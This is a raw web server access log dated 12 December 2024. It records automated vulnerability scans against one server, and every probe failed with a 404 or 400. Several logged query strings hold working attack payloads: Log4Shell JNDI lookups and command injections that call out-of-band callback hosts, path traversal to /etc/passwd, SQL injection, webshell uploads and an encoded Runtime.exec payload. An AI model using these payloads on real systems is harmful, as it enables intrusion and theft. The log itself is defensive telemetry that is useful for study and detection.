Mozilla/5.0+(Windows+NT+6.1;+Win64;+x64;+rv:109.0)+Gecko/20100101+Firefox/115.0 - 404 7 0 204 2024-12-12 12:44:58 103.153.214.94 GET /rest/api/latest/repos - 8172 - 156.251.25.152 Mozilla/5.0+(Macintosh;+Intel+Mac+OS+X+10_15_7)+AppleWebKit/605.1.15+(KHTML,+like+Gecko)+Version/17.4+Safari/605.6.20 - 404 7 0 205 2024-12-12 12:45:05 103.153.214.94 POST /res.php - 8172 - 206.238.196.225 Mozilla/5.0+(Macintosh;+Intel+Mac+OS+X+10_15_7)+AppleWebKit/605.1.15+(KHTML,+like+Gecko)+Version/17.3.1+Safari/605.1.1+20.51 - 404 7 0 107 2024-12-12 12:45:33 103.153.214.94 POST /bic/ssoService/v1/applyCT - 8172 - 206.238.196.225 Mozilla/5.0+(Ubuntu;+Linux+x86_64)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/128.0.0.0+Safari/537.36 - 404 7 0 118 2024-12-12 12:47:18 103.153.214.94 POST /js/jquery_file_upload/server/php/ - 8172 - 156.251.25.152 Mozilla/5.0+(Macintosh;+Intel+Mac+OS+X+10_15_7)+AppleWebKit/605.1.15+(KHTML,+like+Gecko)+Version/17.0.1+Mobile/15E148+Safari/604.1 - 404 7 0 219 2024-12-12 12:48:29 103.153.214.94 POST /vendor/htmlawed/htmlawed/htmLawedTest.php - 8172 - 156.251.25.152 Mozilla/5.0+(CentOS;+Linux+x86_64;+rv:128.0)+Gecko/20100101+Firefox/128.0 - 404 7 0 225 2024-12-12 12:48:32 103.153.214.94 POST /vendor/htmlawed/htmlawed/htmLawedTest.php - 8172 - 156.251.25.152 Mozilla/5.0+(Macintosh;+Intel+Mac+OS+X+12)+AppleWebKit/616.19+(KHTML,+like+Gecko)+Version/17.7.17+Safari/616.19 - 404 7 0 230 2024-12-12 12:48:36 103.153.214.94 POST /vendor/htmlawed/htmlawed/htmLawedTest.php - 8172 - 156.251.25.152 Mozilla/5.0+(Macintosh;+Intel+Mac+OS+X+10_15_7)+AppleWebKit/605.1.15+(KHTML,+like+Gecko)+Version/17.5+Safari/605.9.17 - 404 7 0 202 2024-12-12 12:48:51 103.153.214.94 GET /goanywhere/auth/Login.xhtml - 8172 - 206.238.196.225 Mozilla/5.0+(Macintosh;+Intel+Mac+OS+X+12_0)+AppleWebKit/605.1.15+(KHTML,+like+Gecko)+Version/17.4.1+Safari/605.1.15 - 404 7 0 118 2024-12-12 12:49:16 103.153.214.94 GET / - 8172 - 156.251.25.152 Mozilla/5.0+(Macintosh;+Intel+Mac+OS+X+11)+AppleWebKit/616.13.10+(KHTML,+like+Gecko)+Version/17.2.97+Safari/616.13.10 - 404 7 0 200 2024-12-12 12:50:21 103.153.214.94 POST /wp-admin/admin-ajax.php action=joomsport_md_load 8172 - 156.251.25.152 Mozilla/5.0+(Macintosh;+Intel+Mac+OS+X+10_15_7)+AppleWebKit/605.1.15+(KHTML,+like+Gecko)+Version/17.4.1+Safari/605.1.25 - 404 7 0 223 2024-12-12 12:50:21 103.153.214.94 POST /ioffice/prg/set/wss/ioAssistance.asmx - 8172 - 206.238.196.225 Mozilla/5.0+(X11;+Linux+i686;+rv:124.0)+Gecko/20100101+Firefox/124.0 - 404 7 0 88 2024-12-12 12:50:21 103.153.214.94 POST /ioffice/prg/set/wss/ioAssistance.asmx - 8172 - 206.238.196.225 Mozilla/5.0+(Macintosh;+Intel+Mac+OS+X+10_15_7)+AppleWebKit/605.1.15+(KHTML,+like+Gecko)+Version/17.4.1+Safari/605.2.17 - 404 7 0 87 2024-12-12 12:50:21 103.153.214.94 POST /network_test.php - 8172 - 156.251.25.152 Mozilla/5.0+(X11;+Linux+x86_64;+rv:122.0)+Gecko/20100101+Firefox/122.0 - 404 7 0 197 2024-12-12 12:52:50 103.153.214.94 POST /wp-admin/admin-ajax.php action=iws_gff_fetch_states 8172 - 156.251.25.152 Mozilla/5.0+(Macintosh;+Intel+Mac+OS+X+10_15_7)+AppleWebKit/605.1.15+(KHTML,+like+Gecko)+Version/17.4.1+Safari/605.2.20 - 404 7 0 206 2024-12-12 12:53:11 103.153.214.94 GET /login/ - 8172 - 156.251.25.152 Mozilla/5.0+(Macintosh;+Intel+Mac+OS+X+10_15_7)+AppleWebKit/605.1.15+(KHTML,+like+Gecko)+Version/17.2.1+Safari/605.1.14 - 404 7 0 201 2024-12-12 12:53:50 103.153.214.94 GET /index.asp - 8172 - 156.251.25.152 Mozilla/5.0+(Macintosh;+Intel+Mac+OS+X+10.15;+rv:125.0)+Gecko/20100101+Firefox/125.0 - 404 7 0 204 2024-12-12 12:55:07 103.153.214.94 POST /iOffice/prg/set/wss/udfmr.asmx - 8172 - 206.238.196.225 Mozilla/5.0+(Windows+NT+10.0;+Win64;+x64;+rv:91.0)+Gecko/20100101+Firefox/91.0 - 404 7 0 86 2024-12-12 12:56:18 103.153.214.94 GET /index.php/user/ - 8172 - 156.251.25.152 Mozilla/5.0+(Macintosh;+Intel+Mac+OS+X+10_15_7)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/106.0.0.0+Safari/537.36 - 404 7 0 226 2024-12-12 12:57:13 103.153.214.94 POST /imc/flexFileUpload - 8172 - 206.238.196.225 Mozilla/5.0+(SS;+Linux+i686;+rv:121.0)+Gecko/20100101+Firefox/121.0 - 404 7 0 85 2024-12-12 12:57:25 103.153.214.94 GET /imc/flex/topobg/TlLFBuxg3U.txt - 8172 - 206.238.196.225 Mozilla/5.0+(Macintosh;+Intel+Mac+OS+X+10_15_7)+AppleWebKit/605.1.15+(KHTML,+like+Gecko)+Version/17.4.1+Safari/605.9.21 - 404 7 0 115 2024-12-12 12:57:36 103.153.214.94 POST /cas/fileUpload/upload token=/../../../../../var/lib/tomcat8/webapps/cas/js/lib/buttons/uQf8h.jsp&name=222" 8172 - 206.238.196.225 Mozilla/5.0+(Macintosh;+Intel+Mac+OS+X+10_10_3)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/43.0.2357.81+Safari/537.36 - 404 7 0 122 2024-12-12 12:57:49 103.153.214.94 GET /cas/js/lib/buttons/uQf8h.jsp - 8172 - 206.238.196.225 Mozilla/5.0+(Macintosh;+Intel+Mac+OS+X+10_15_7)+AppleWebKit/605.1.15+(KHTML,+like+Gecko)+Version/17.4.1+Safari/605.4.22 - 404 7 0 108 2024-12-12 12:58:13 103.153.214.94 GET /api/v2/cmdb/system/admin - 8172 - 156.251.25.152 Node.js - 404 7 0 205 2024-12-12 12:58:13 103.153.214.94 GET /wp-admin/admin-ajax.php action=mcwp_table&mcwp_id=1&order[0][column]=0&columns[0][name]=name+AND+(SELECT+1+FROM+(SELECT(SLEEP(7)))aaaa)--+- 8172 - 156.251.25.152 Mozilla/5.0+(Fedora;+Linux+x86_64;+rv:125.0)+Gecko/20100101+Firefox/125.0 - 404 7 0 205 2024-12-12 12:58:17 103.153.214.94 PUT /api/v2/cmdb/system/admin/admin - 8172 - 156.251.25.152 Report+Runner - 404 7 0 198 2024-12-12 12:58:17 103.153.214.94 GET /wp-content/plugins/cryptocurrency-widgets-pack/readme.txt - 8172 - 156.251.25.152 Mozilla/5.0+(Windows+NT+6.1;+Win64;+x64;+rv:75.0)+Gecko/20100101+Firefox/75.0 - 404 7 0 201 2024-12-12 12:58:58 103.153.214.94 POST /wp-admin/admin-ajax.php action=get_tag_fonts 8172 - 156.251.25.152 Mozilla/5.0+(Macintosh;+Intel+Mac+OS+X+14.3)+AppleWebKit/616.24+(KHTML,+like+Gecko)+Version/17.2+Safari/616.24 - 404 7 0 198 2024-12-12 13:00:00 103.153.214.94 POST /login/index.php login=$(ping${IFS}-nc${IFS}2${IFS}`whoami`.ctd67t3bclspkptm3qo0m48hppp7cunyt.oast.fun) 8172 - 156.251.25.152 Mozilla/5.0+(Macintosh;+Intel+Mac+OS+X+12_2_8;+en)+AppleWebKit/605.1.15+(KHTML,+like+Gecko)+Version/17.3.2+Safari/605.1.15 - 404 7 0 209 2024-12-12 13:00:03 103.153.214.94 POST /OAapp/bfapp/buffalo/workFlowService - 8172 - 206.238.196.225 Mozilla/5.0+(Macintosh;+Intel+Mac+OS+X+10_15_7)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/108.0.0.0+Safari/537.36 - 404 7 0 107 2024-12-12 13:00:09 103.153.214.94 POST /mgmt/shared/iapp/rpm-spec-creator - 8172 - 156.251.25.152 Mozilla/5.0+(Windows+NT+6.1;+WOW64)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/43.0.2357.124+Safari/537.36 - 404 7 0 205 2024-12-12 13:00:30 103.153.214.94 GET / phonepe_action=curltestPhonePe&url=http://ctd67t3bclspkptm3qo0xc1q6gyobs9e6.oast.fun 8172 - 156.251.25.152 Mozilla/5.0+(Macintosh;+Intel+Mac+OS+X+11)+AppleWebKit/616.16+(KHTML,+like+Gecko)+Version/17.0.90+Safari/616.16 - 404 7 0 218 2024-12-12 13:00:54 103.153.214.94 GET /api/system/deviceinfo - 8172 - 206.238.196.225 Mozilla/5.0+(Kubuntu;+Linux+i686)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/118.0.0.0+Safari/537.36 https://bcvt.kontum.gov.vn:8172 404 7 0 91 2024-12-12 13:03:12 103.153.214.94 GET /wp-admin/admin-ajax.php action=loginas_return_admin 8172 - 156.251.25.152 Mozilla/5.0+(Windows+NT+6.1;+Win64;+x64;+rv:81.0)+Gecko/20100101+Firefox/81.0 - 404 7 0 232 2024-12-12 13:03:15 103.153.214.94 GET /wp-admin/users.php - 8172 - 156.251.25.152 Mozilla/5.0+(Ubuntu;+Linux+x86_64)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/122.0.0.0+Safari/537.36 - 404 7 0 203 2024-12-12 13:03:37 103.153.214.94 GET /manager/radius/server_ping.php ip=127.0.0.1|cat%20/etc/passwd>../../2q3kZ6ohrXHHnbfUOG9mG4a6Gby.txt&id=1 8172 - 206.238.196.225 Mozilla/5.0+(Macintosh;+Intel+Mac+OS+X+14.5)+AppleWebKit/605.1.15+(KHTML,+like+Gecko)+Version/17.5+Safari/605.1.15 - 404 7 0 93 2024-12-12 13:03:42 103.153.214.94 GET /include/config.properties - 8172 - 206.238.196.225 Mozilla/5.0+(Macintosh;+Intel+Mac+OS+X+15_5_7;+es)+AppleWebKit/605.1.15+(KHTML,+like+Gecko)+Version/17.0.7+Safari/605.1.15 - 404 7 0 90 2024-12-12 13:03:48 103.153.214.94 GET /2q3kZ6ohrXHHnbfUOG9mG4a6Gby.txt - 8172 - 206.238.196.225 Mozilla/5.0+(X11;+Linux+x86_64;+rv:109.0)+Gecko/20100101+Firefox/117.0 - 404 7 0 109 2024-12-12 13:04:30 103.153.214.94 POST /wp-admin/admin-ajax.php action=cfom_upload_file&name=2q6JQix4SiykbpfubkhY0AFgtFj.pHp 8172 - 156.251.25.152 Mozilla/5.0+(X11;+Linux+x86_64;+rv:128.0)+Gecko/20100101+Firefox/128.0 - 404 7 0 220 2024-12-12 13:04:33 103.153.214.94 GET /wp-content/uploads/cfom_files/2q6jqix4siykbpfubkhy0afgtfj.php - 8172 - 156.251.25.152 Mozilla/5.0+(CentOS;+Linux+x86_64)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/122.0.0.0+Safari/537.36 - 404 7 0 203 2024-12-12 13:04:44 103.153.214.94 GET / - 8172 - 156.251.25.152 Mozilla/5.0+(Macintosh;+Intel+Mac+OS+X+10_15_6)+AppleWebKit/605.1.15+(KHTML,+like+Gecko)+Version/15.6.6+Safari/605.1.15 - 404 7 0 210 2024-12-12 13:04:47 103.153.214.94 GET /cgi-bin/ExportLogs.sh - 8172 - 156.251.25.152 Mozilla/5.0+(SS;+Linux+x86_64;+rv:122.0)+Gecko/20100101+Firefox/122.0 - 404 7 0 203 2024-12-12 13:04:57 103.153.214.94 POST /webmail/basic/ - 8172 - 206.238.196.225 Mozilla/5.0+(Windows+NT+10.0;+rv:102.0)+Gecko/20100101+Firefox/102.0 - 404 7 0 85 2024-12-12 13:05:07 103.153.214.94 POST /fileDownload action=downloadBackupFile 8172 - 206.238.196.225 Mozilla/5.0+(Macintosh;+Intel+Mac+OS+X+10_15_6)+AppleWebKit/605.1.15+(KHTML,+like+Gecko)+Version/15.6.1+Safari/605.1.15 - 404 7 0 86 2024-12-12 13:05:19 103.153.214.94 POST /fileDownload action=downloadBackupFile 8172 - 206.238.196.225 Mozilla/5.0+(CentOS;+Linux+x86_64)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/125.0.0.0+Safari/537.36 - 404 7 0 83 2024-12-12 13:05:59 103.153.214.94 GET /admin/login/index.php - 8172 - 156.251.25.152 Mozilla/5.0+(Windows;+U;+Windows+NT+6.0;+en-US;+rv:1.9.1.2)+Gecko/20090729+Firefox/3.5.2+(.NET+CLR+3.5.30729) - 404 7 0 206 2024-12-12 13:06:02 103.153.214.94 POST /index.php mnu=login 8172 - 206.238.196.225 Mozilla/5.0+(Windows+NT+10.0;+Win64;+x64;+WebView/3.0)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/70.0.3538.102+Safari/537.36+Edge/18.18362 - 404 7 0 90 2024-12-12 13:06:47 103.153.214.94 GET /wp-json/lp/v1/courses/archive-course template_path=..%2F..%2F..%2Fetc%2Fpasswd&return_type=html 8172 - 156.251.25.152 Mozilla/5.0+(Kubuntu;+Linux+i686;+rv:128.0)+Gecko/20100101+Firefox/128.0 - 404 7 0 220 2024-12-12 13:06:48 103.153.214.94 POST /SamlResponseServlet - 8172 - 156.251.25.152 Mozilla/5.0+(Windows+NT+6.3;+Win64;+x64)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/49.0.2623.87+Safari/537.36 - 404 7 0 232 2024-12-12 13:06:51 103.153.214.94 GET /solr/solrdefault/debug/dump param=ContentStreams&stream.url=file:///etc/passwd 8172 - 156.251.25.152 Mozilla/5.0+(Macintosh;+Intel+Mac+OS+X+10_14_6)+AppleWebKit/605.1.15+(KHTML,+like+Gecko)+Version/14.1.2+Safari/605.1.15 - 404 7 0 203 2024-12-12 13:06:51 103.153.214.94 GET /solr/solrdefault/debug/dump param=ContentStreams&stream.url=file://c:/windows/win.ini 8172 - 156.251.25.152 Mozilla/5.0+(Macintosh;+Intel+Mac+OS+X+10_15_7)+AppleWebKit/605.1.15+(KHTML,+like+Gecko)+Version/17.4.1+Safari/605.7.19 - 404 7 0 215 2024-12-12 13:07:07 103.153.214.94 POST /sysShell - 8172 - 206.238.196.225 Mozilla/5.0+(CentOS;+Linux+i686)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/128.0.0.0+Safari/537.36 - 404 7 0 358 2024-12-12 13:07:51 103.153.214.94 POST /aspera/faspex/package_relay/relay_package - 8172 - 156.251.25.152 Mozilla/5.0+(Debian;+Linux+i686)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/125.0.0.0+Safari/537.36 - 404 7 0 205 2024-12-12 13:08:13 103.153.214.94 POST /classes/Login.php f=login 8172 - 156.251.25.152 Mozilla/5.0+(Macintosh;+Intel+Mac+OS+X+10_15_7)+AppleWebKit/605.1.15+(KHTML,+like+Gecko)+LoiLoNote/25.0.1+Version/17.4.1+Safari/605.1.15 - 404 7 0 222 2024-12-12 13:08:15 103.153.214.94 GET /admin/ - 8172 - 156.251.25.152 Mozilla/5.0+(Windows+NT+10.0;+Win64;+x64;+rv:95.0)+Gecko/20100101+Firefox/95.0 - 404 7 0 200 2024-12-12 13:09:24 103.153.214.94 POST /wp-admin/admin-ajax.php - 8172 - 156.251.25.152 Mozilla/5.0+(Macintosh;+Intel+Mac+OS+X+10_15_7)+AppleWebKit/605.1.15+(KHTML,+like+Gecko)+Version/17.2.1+Safari/605.4.20 - 404 7 0 204 2024-12-12 13:09:30 103.153.214.94 GET / - 8172 - 156.251.25.152 Mozilla/5.0+(Macintosh;+Intel+Mac+OS+X+10_15_7)+AppleWebKit/605.1.15+(KHTML,+like+Gecko)+Version/17.0+Safari/605.1.41 - 404 7 0 212 2024-12-12 13:09:30 103.153.214.94 GET / - 8172 - 156.251.25.152 Mozilla/5.0+(SS;+Linux+i686)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/127.0.0.0+Safari/537.36 - 404 7 0 220 2024-12-12 13:13:15 103.153.214.94 GET / - 8172 - 156.251.25.152 Mozilla/5.0+(Knoppix;+Linux+i686)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/121.0.0.0+Safari/537.36 - 404 7 0 203 2024-12-12 13:13:16 103.153.214.94 GET / - 8172 - 156.251.25.152 Mozilla/5.0+(X11;+Linux+x86_64;+rv:122.0)+Gecko/20100101+Firefox/122.0 - 404 7 0 228 2024-12-12 13:14:33 103.153.214.94 POST /banker/index.php - 8172 - 156.251.25.152 Mozilla/5.0+(Debian;+Linux+i686)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/119.0.0.0+Safari/537.36 - 404 7 0 209 2024-12-12 13:14:42 103.153.214.94 POST /http/index.php - 8172 - 206.238.196.225 Mozilla/5.0+(Macintosh;+Intel+Mac+OS+X+14_3)+AppleWebKit/605.1.15+(KHTML,+like+Gecko)+Version/17.2+Safari/605.1.15 - 404 7 0 83 2024-12-12 13:14:49 103.153.214.94 POST /goanywhere/lic/accept - 8172 - 156.251.25.152 Mozilla/5.0+(ZZ;+Linux+i686)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/119.0.0.0+Safari/537.36 - 404 7 0 236 2024-12-12 13:14:50 103.153.214.94 GET /wp-content/plugins/wp-statistics/readme.txt - 8172 - 156.251.25.152 Mozilla/5.0+(SS;+Linux+x86_64;+rv:128.0)+Gecko/20100101+Firefox/128.0 - 404 7 0 251 2024-12-12 13:15:04 103.153.214.94 GET /http-bind room=${jndi:ldap://${:-320}${:-160}.${hostName}.username.ctcj3jjbclslbev4n7q05yy5kg8a8t7ow.oast.live/h0rFp} 8172 - 206.238.196.225 Mozilla/5.0+(Macintosh;+Intel+Mac+OS+X+10_15_7)+AppleWebKit/605.1.15+(KHTML,+like+Gecko)+Version/18.0+Mobile/15E148+Safari/604.1 https://bcvt.kontum.gov.vn:8172 404 7 0 114 2024-12-12 13:16:35 103.153.214.94 POST /Kingdee.BOS.ServiceFacade.ServicesStub.DevReportService.GetBusinessObjectData.common.kdsvc - 8172 - 206.238.196.225 Mozilla/5.0+(Macintosh;+Intel+Mac+OS+X+10_15_7)+AppleWebKit/605.1.15+(KHTML,+like+Gecko)+Version/16.3+Safari/605.1.15 - 404 7 0 85 2024-12-12 13:20:16 103.153.214.94 POST /wp-admin/admin-ajax.php - 8172 - 156.251.25.152 Mozilla/5.0+(Macintosh;+Intel+Mac+OS+X+10.15;+rv:71.0)+Gecko/20100101+Firefox/71.0 - 404 7 0 209 2024-12-12 13:20:25 103.153.214.94 POST /json-rpc/ - 8172 - 206.238.196.225 Mozilla/5.0+(X11;+Linux+x86_64;+rv:71.0)+Gecko/20100101+Firefox/71.0 - 404 7 0 89 2024-12-12 13:20:53 103.153.214.94 GET /flash/addcrypted2 - 8172 - 156.251.25.152 Mozilla/5.0+(Macintosh;+Intel+Mac+OS+X+10_15_7)+AppleWebKit/605.1.15+(KHTML,+like+Gecko)+Version/17.4.1+Safari/605.1.51 - 404 7 0 226 2024-12-12 13:21:02 103.153.214.94 POST /flash/addcrypted2 - 8172 - 156.251.25.152 Mozilla/5.0+(Macintosh;+Intel+Mac+OS+X+10_15_7)+AppleWebKit/605.1.15+(KHTML,+like+Gecko)+Tokai/21.1.294403+Version/17.2+Safari/605.1.15 - 404 7 0 200 2024-12-12 13:21:25 103.153.214.94 POST /index.php c=blocked&action=continue 8172 - 156.251.25.152 Mozilla/5.0+(Windows+NT+10.0;+rv:128.0)+Gecko/20100101+Firefox/128.0 - 404 7 0 202 2024-12-12 13:21:25 103.153.214.94 POST /jeecg-boot/jmreport/qurestSql - 8172 - 156.251.25.152 Mozilla/5.0+(SS;+Linux+i686)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/118.0.0.0+Safari/537.36 - 404 7 0 232 2024-12-12 13:21:34 103.153.214.94 POST /fileDownload action=downloadBackupFile 8172 - 206.238.196.225 Mozilla/5.0+(X11;+Linux+x86_64)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Safari/537.36+HeyTapBrowser/45.11.0.1.1+Chrome/91.0.4472.88 - 404 7 0 84 2024-12-12 13:21:42 103.153.214.94 POST /fileDownload action=downloadBackupFile 8172 - 206.238.196.225 Mozilla/5.0+(Ubuntu;+Linux+i686)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/128.0.0.0+Safari/537.36 - 404 7 0 83 2024-12-12 13:22:18 103.153.214.94 POST /wbm/plugins/wbm-legal-information/platform/pfcXXX/licenses.php - 8172 - 156.251.25.152 Mozilla/5.0+(Macintosh;+Intel+Mac+OS+X+10_15_7)+AppleWebKit/605.1.15+(KHTML,+like+Gecko)+Version/17.4+Safari/605.6.20 - 404 7 0 204 2024-12-12 13:22:39 103.153.214.94 GET /accounts/login/ - 8172 - 156.251.25.152 Mozilla/5.0+(Knoppix;+Linux+x86_64)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/119.0.0.0+Safari/537.36 - 404 7 0 219 2024-12-12 13:23:14 103.153.214.94 GET / - 8172 - 156.251.25.152 Mozilla/5.0+(Macintosh;+Intel+Mac+OS+X+14_3)+AppleWebKit/605.1.15+(KHTML,+like+Gecko)+Version/17.4+Safari/605.1.15 - 404 7 0 220 2024-12-12 13:23:34 103.153.214.94 GET /data/sys-common/datajson.js s_bean=sysFormulaSimulateByJS&script=%66%75%6e%63%74%69%6f%6e%20%74%65%73%74%28%29%7b%20%72%65%74%75%72%6e%20%6a%61%76%61%2e%6c%61%6e%67%2e%52%75%6e%74%69%6d%65%7d%3b%72%3d%74%65%73%74%28%29%3b%72%2e%67%65%74%52%75%6e%74%69%6d%65%28%29%2e%65%78%65%63%28%22%70%69%6e%67%20%2d%63%20%34%20ctcj3jjbclslbev4n7q0bgy5ae8kdq1x6.oast.live%22%29&type=1 8172 - 206.238.196.225 Mozilla/5.0+(Macintosh;+Intel+Mac+OS+X+10_15_7)+AppleWebKit/605.1.15+(KHTML,+like+Gecko)+Version/17.5+Safari/605.1.61 - 404 7 0 88 2024-12-12 13:24:15 103.153.214.94 GET /queues - 8172 - 156.251.25.152 Mozilla/5.0+(SS;+Linux+x86_64;+rv:120.0)+Gecko/20100101+Firefox/120.0 - 404 7 0 204 2024-12-12 13:24:15 103.153.214.94 POST /%77eb%75i_%77sma_Http - 8172 - 156.251.25.152 Mozilla/5.0+(Macintosh;+Intel+Mac+OS+X+10_15_7)+AppleWebKit/605.1.15+(KHTML,+like+Gecko)+Version/15.3+Safari/605.1.15 - 400 0 0 217 2024-12-12 13:24:26 103.153.214.94 POST /v1/app/writeFileSync - 8172 - 206.238.196.225 Mozilla/5.0+(Windows+NT+10.0;+rv:128.0+)+Gecko/20100101+Firefox/128.0 - 404 7 0 92 2024-12-12 13:24:30 103.153.214.94 POST /v1/app/readFileSync - 8172 - 206.238.196.225 Mozilla/5.0+(Macintosh;+Intel+Mac+OS+X+14_3)+AppleWebKit/605.1.15+(KHTML,+like+Gecko)+Version/17.2+Safari/605.1.15 - 404 7 0 90 2024-12-12 13:24:39 103.153.214.94 POST /saas./resttosaasservlet - 8172 - 156.251.25.152 Mozilla/5.0+(Macintosh;+Intel+Mac+OS+X+10_15_7)+AppleWebKit/605.1.15+(KHTML,+like+Gecko)+Version/16.6.1+Safari/605.1.15 - 404 0 0 207 2024-12-12 13:25:06 103.153.214.94 POST /sys/ui/extend/varkind/custom.jsp - 8172 - 206.238.196.225 Mozilla/5.0+(X11;+Linux+x86_64;+rv:70.0)+Gecko/20100101+Firefox/70.0 - 404 7 0 120 2024-12-12 13:25:35 103.153.214.94 GET /api/v2/parameters/core/ - 8172 - 156.251.25.152 7h3h4ckv157 - 404 7 0 205 2024-12-12 13:26:27 103.153.214.94 GET /systemController/showOrDownByurl.do down&dbPath=../../../../../../etc/passwd 8172 - 206.238.196.225 Mozilla/5.0+(Macintosh;+Intel+Mac+OS+X+10_15_7)+AppleWebKit/605.1.15+(KHTML,+like+Gecko)+Version/17.5+Safari/605.2.19 - 404 7 0 83 2024-12-12 13:26:31 103.153.214.94 GET /systemController/showOrDownByurl.do down&dbPath=../Windows/win.ini 8172 - 206.238.196.225 Mozilla/5.0+(Ubuntu;+Linux+x86_64;+rv:120.0)+Gecko/20100101+Firefox/120.0 - 404 7 0 118 2024-12-12 13:26:42 103.153.214.94 GET /api/logstash/pipeline/${jndi:ldap:/${:-970}${:-627}.${hostName}.username.ctcj3jjbclslbev4n7q0imdigmkeq1hit.oast.live/PDZdj} - 8172 - 206.238.196.225 Mozilla/5.0+(Macintosh;+Intel+Mac+OS+X+10_15_7)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/126.0.0.0+Safari/537.36 - 400 0 0 122 2024-12-12 13:26:56 103.153.214.94 POST /login - 8172 - 206.238.196.225 Mozilla/5.0+(SS;+Linux+i686;+rv:122.0)+Gecko/20100101+Firefox/122.0 https://bcvt.kontum.gov.vn:8172 404 7 0 105 2024-12-12 13:27:30 103.153.214.94 POST /two_fact_auth - 8172 - 206.238.196.225 Mozilla/5.0+(Debian;+Linux+x86_64)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/118.0.0.0+Safari/537.36 https://bcvt.kontum.gov.vn:8172/configurations 404 7 0 92 2024-12-12 13:27:55 103.153.214.94 POST /MUP/ - 8172 - 206.238.196.225 Mozilla/5.0+(Fedora;+Linux+x86_64;+rv:123.0)+Gecko/20100101+Firefox/123.0 bcvt.kontum.gov.vn:8172/MUP 404 7 0 107 2024-12-12 13:28:30 103.153.214.94 POST /cgi-bin/login.cgi - 8172 - 206.238.196.225 Mozilla/5.0+(Windows+NT+10.0;+Win64;+x64;+rv:100.0)+Gecko/20100101+Firefox/100.0 - 404 7 0 97 2024-12-12 13:28:41 103.153.214.94 GET /UploadService/Page/ - 8172 - 206.238.196.225 Mozilla/5.0+(Macintosh;+Intel+Mac+OS+X+10_15_7)+AppleWebKit/605.1.15+(KHTML,+like+Gecko)+Version/17.3+Safari/605.3.25 - 404 7 0 103 2024-12-12 13:28:59 103.153.214.94 POST /kubepi/api/v1/users - 8172 - 156.251.25.152 Mozilla/5.0+(Macintosh;+Intel+Mac+OS+X+10_15_7)+AppleWebKit/605.1.15+(KHTML,+like+Gecko)+Version/17.2.1+Safari/605.1.14 - 404 7 0 203 2024-12-12 13:29:08 103.153.214.94 POST /debug.php - 8172 - 206.238.196.225 Mozilla/5.0+(X11;+CrOS+x86_64+14541.0.0)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/125.0.0.0+Safari/537.36 - 404 7 0 70 2024-12-12 13:29:10 103.153.214.94 POST /kubepi/api/v1/systems/login/logs/search pageNum=1&&pageSize=10 8172 - 156.251.25.152 Mozilla/5.0+(Macintosh;+Intel+Mac+OS+X+10_15_7)+AppleWebKit/605.1.15+(KHTML,+like+Gecko)+Version/17.2.1+Safari/605.1.1 - 404 7 0 201 2024-12-12 13:29:10 103.153.214.94 POST /json/setup-restore.action - 8172 - 156.251.25.152 Mozilla/5.0+(X11;+Linux+x86_64)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/117.0.0.0+Safari/537.36 - 404 7 0 222 2024-12-12 13:29:11 103.153.214.94 POST /template/aui/text-inline.vm - 8172 - 156.251.25.152 Mozilla/5.0+(Macintosh;+Intel+Mac+OS+X+10_15_7)+AppleWebKit/605.1.15+(KHTML,+like+Gecko)+Version/17.4.1+Mobile/15E148+Safari/604.1 - 404 7 0 241 2024-12-12 13:29:25 103.153.214.94 GET /csrf - 8172 - 156.251.25.152 Mozilla/5.0+(ZZ;+Linux+i686;+rv:122.0)+Gecko/20100101+Firefox/122.0 - 404 7 0 201 2024-12-12 13:30:26 103.153.214.94 POST /direct/polling/CommandsPolling.php - 8172 - 206.238.196.225 Mozilla/5.0+(Macintosh;+Intel+Mac+OS+X+10_15_7)+AppleWebKit/605.1.15+(KHTML,+like+Gecko)+Version/17.4.1+Safari/605.2.22 - 404 7 0 105 2024-12-12 13:30:26 103.153.214.94 GET /netcore_get.cgi - 8172 - 206.238.196.225 Mozilla/5.0+(Macintosh;+Intel+Mac+OS+X+10_15_7)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/125.0.0.0+Safari/537.36 - 404 7 0 100 2024-12-12 13:32:14 103.153.214.94 POST /ajax.php action=login 8172 - 206.238.196.225 Mozilla/5.0+(Macintosh;+Intel+Mac+OS+X+10.15;+rv:125.0)+Gecko/20100101+Firefox/125.0 - 404 7 0 101 2024-12-12 13:32:18 103.153.214.94 GET /index.php page=home 8172 - 206.238.196.225 Mozilla/5.0+(Macintosh;+Intel+Mac+OS+X+10_15_7)+AppleWebKit/605.1.15+(KHTML,+like+Gecko)+Version/17.3.1+Safari/605.1.1+20.51 - 404 7 0 86 2024-12-12 13:32:24 103.153.214.94 POST /adminPage/remote/cmdOver - 8172 - 206.238.196.225 Mozilla/5.0+(Debian;+Linux+i686;+rv:124.0)+Gecko/20100101+Firefox/124.0 - 404 7 0 92 2024-12-12 13:32:30 103.153.214.94 GET / - 8172 - 206.238.196.225 Mozilla/5.0+(Macintosh;+Intel+Mac+OS+X+12)+AppleWebKit/616.19+(KHTML,+like+Gecko)+Version/17.7.17+Safari/616.19 - 404 7 0 106 2024-12-12 13:32:31 103.153.214.94 POST /ajax-api/2.0/mlflow/registered-models/create - 8172 - 156.251.25.152 